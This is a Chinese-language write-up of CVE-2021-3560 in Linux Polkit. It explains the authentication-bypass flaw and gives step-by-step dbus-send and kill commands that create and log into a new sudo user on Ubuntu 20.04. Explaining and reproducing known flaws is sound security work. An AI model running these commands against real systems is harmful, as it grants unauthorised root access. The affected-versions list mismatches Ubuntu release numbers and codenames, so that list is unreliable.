01 漏洞介绍

CVE-2021-3560漏洞存在于系统服务Polkit中，同时因为Polkit被Systemd所调用，因此所有默认安装了Systemd的Linux发行版都会使用Polkit。

该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误，而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。

正常情况下执行流程如下：

1. dbus-send会要求帐户守护程序创建一个新用户
   
2. account-daemon从dbus-send接收D-Bus消息，该消息包括了发送者的唯一总线名称，假设它为“:1.96”，且此名称无法伪造
   
3. account-daemon询问Polkit消息:1.96是否已经被授权创建用户
   
4. Polkit向dbus-daemon询问消息的UID:1.96
   
5. 如果消息:1.96 的UID为“0”，则Polkit将会立即授权该请求。如果不是，将会向身份验证代理发送允许授权请求的管理员用户列表
   
6. 身份验证代理弹出一个对话框向用户进行密码认证
   
7. 用户输入后，身份验证代理将密码发送给Polkit
   
8. 身份验证通过后，Polkit将“yes”发送给帐户守护程序。
   
9. account-daemon创建新的用户帐户。
   

问：为什么强制终止dbus-send会导致身份验证绕过？

答：因为该漏洞出现在上述执行流程的第4步。如果Polkit向dbus-daemon询问消息:1.96的UID，而消息:1.96不存在时就会引发错误，并且Polkit未能正确处理此错误：它没有拒绝请求，而是将请求视为来自UID 0的进程，也就是说，它会认为该请求来自root进程，因此它会直接授权该请求。

02 漏洞复现

复现所用到的环境为

Ubuntu 20.04.2 LTS

首先使用如下命令查看系统运行Polkit的过程需用到多少时间：

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwn string:"pwn your host" int32:1

返回结果为

real 0m2.939suser 0m0.000ssys  0m0.038

然后输入第二条命令，设置将进程kill的时间为sys运行时间的一半左右（这样是为了提高成功率，这点后面会进行解释）：

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:pwn string:"pwn your host" int32:1 & sleep 0.024s ; kill $!

如果利用成功可添加一个名为pwn的sudo权限用户，如果一次不成功可以多次尝试（笔者曾出现多次都没成功的情况，所以如果遇到这种情况不要着急），如果多次不成功可以尝试修改kill进程的时间

输入id pwn查看用户，此时已经成功利用

接下来使用openssl passwd -5命令生成一条密文，内容随意，这里使用qwertyuiop。这是为了添加pwn用户的登录密码，由于无法使用明文，所以需要使用ssl加密

接下来是第三条命令，注意将uid、kill时间、密码进行相应的修改：

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'passwd' string:GoldenEye & sleep 0.008s ; kill $!

执行

同样，如果不成功请尝试多次

最后，试着用刚才添加的密码登录pwn用户su - pwn

成功

可以看到已经成功登录新创建的sudo用户pwn，到这一步提权就算圆满完成

视频演示

https://www.bilibili.com/video/BV12o4y1y7gC

03 影响版本

红帽企业版RHEL 8

Fedora 21及以上版本

Debian测试版("bullseye")

Ubuntu 20.04(Hirsute Hippo)

Ubuntu 20.10(Groovy Gorilla)

Ubuntu 21.04LTS(Focal Fossa)

04  后记

为什么kill进程的时间不确定？因为Polkit在不同的代码路径上多次向dbus-daemon请求消息的UID时，这些代码路径大多数都能正确处理，只有其中之一会引发错误。因此如果dbus-send命令提前终止（kill进程的时间过早），它将正确地处理该问题并且拒绝请求。所以关键在于需要在适当的时间kill掉进程，所以多数情况下需要执行多次才能成功，而这也是这个漏洞能存在七年之久而没被发现的原因。

05 参考文档

https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/https://ubuntu.com/security/CVE-2021-3560